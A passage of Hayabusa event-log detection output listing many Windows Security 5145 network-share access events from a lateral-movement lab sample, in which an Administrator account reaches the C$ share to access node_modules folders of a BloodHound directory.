+09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : 
Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share 
Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 